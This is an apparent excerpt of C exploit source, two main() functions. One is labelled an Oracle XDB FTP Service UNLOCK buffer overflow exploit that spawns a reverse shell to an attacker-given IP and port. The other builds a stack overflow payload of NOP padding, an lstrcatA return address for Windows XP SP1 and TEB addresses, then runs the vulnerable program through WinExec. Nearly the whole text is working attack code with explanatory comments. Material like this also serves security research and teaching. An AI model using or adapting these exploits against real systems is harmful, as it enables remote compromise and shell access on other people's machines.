int main(int argc, char *argv[])
{
if(argc != 6)
{
printf("\n\n\tOracle XDB FTP Service UNLOCK Buffer Overflow Exploit");
printf("\n\t\tfor Blackhat (http://www.blackhat.com)");
printf("\n\n\tSpawns a reverse shell to specified port");
printf("\n\n\tUsage:\t%s host userid password ipaddress port",argv[0]);
printf("\n\n\tDavid Litchfield\n\t([email protected])");
printf("\n\t6th July 2003\n\n\n");
return 0;
}
strncpy(host,argv[1],250);
if(StartWinsock()==0)
return printf("Error starting Winsock.\n");
SetUpExploit(argv[4],atoi(argv[5]));
strcat(exploit_code,short_jump);
strcat(exploit_code,exception_handler);
strcat(exploit_code,exploit);
strcat(exploit_code,"\r\n");
GainControlOfOracle(argv[2],argv[3]);
return 0;
}
int main(int argc, char *argv[])
{
int cnt = 0;
unsigned char buffer[1000]="";
if(argc !=3)
return 0;
StartWinsock();
// Set the IP address and port in the exploit code
// If your IP address has a NULL in it then the
// string will be truncated.
SetUpExploit(argv[1],atoi(argv[2]));
// name of the vulnerable program
strcpy(buffer,"nes ");
// copy exploit code to the buffer
strcat(buffer,exploit);
// Pad out the buffer
while(cnt < 25)
{
strcat(buffer,"\x90\x90\x90\x90");
cnt ++;
}
strcat(buffer,"\x90\x90\x90\x90");
// Here's where we overwrite the saved return address
// This is the address of lstrcatA on Windows XP SP 1
// 0x77E74B66
strcat(buffer,"\x66\x4B\xE7\x77");
// Set the return address for lstrcatA
// this is where our code will be copied to
// in the TEB
strcat(buffer,"\xBC\xE1\xFD\x7F");
// Set the destination buffer for lstrcatA
// This is in the TEB and we'll return to
// here.
strcat(buffer,"\xBC\xE1\xFD\x7F");
// This is our source buffer. This is the address
// where we find our original buffer on the stack
strcat(buffer,"\x10\xFB\x12");
// Now execute the vulnerable program!
WinExec(buffer,SW_MAXIMIZE);
return 0;
}